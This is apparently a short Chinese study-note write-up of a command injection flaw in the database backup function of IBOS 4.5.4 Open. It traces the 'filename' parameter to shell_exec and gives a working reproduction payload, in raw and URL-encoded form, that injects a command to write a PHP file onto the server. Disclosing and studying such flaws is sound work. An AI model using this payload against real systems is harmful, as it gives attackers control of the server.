赞
踩
漏洞描述:
IBOS存在命令注入漏洞,该漏洞源于IBOS 4.5.4 Open版本中,数据库备份存在命令注入漏洞。攻击者可利用该漏洞获取服务器控制权限。
漏洞利用条件:
审计shell_exec函数,$dumpFile可控,追踪$dumpFile,继续查看 ,发现$dumpFile最终来源于REQUEST传参filename,即
$dumpFile -> $backupFileName (.sql) -> $fileName(过滤内容.'/,\\) -> filename传参决定
漏洞影响范围:
IBOS 4.5.4
漏洞复现:
1.进入页面后台(发现数据库有备份功能,备份文件名还可以修改,这里可能可以执行)
抓包,将filename参数写到了url中构造的函数:
qwer1%26echo”<?Php phpinfo();?>”>>886%PATHEXT:~0,1%php%26111
进行url编码:
qwer1%2526echo%E2%80%9D%3C?Php%20phpinfo();?%3E%E2%80%9D%3E%3E886%25PATHEXT:~0,1%25php%2526111然后访问文件:
修复建议:
升级补丁修复漏洞
学习记录,仅供参考
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。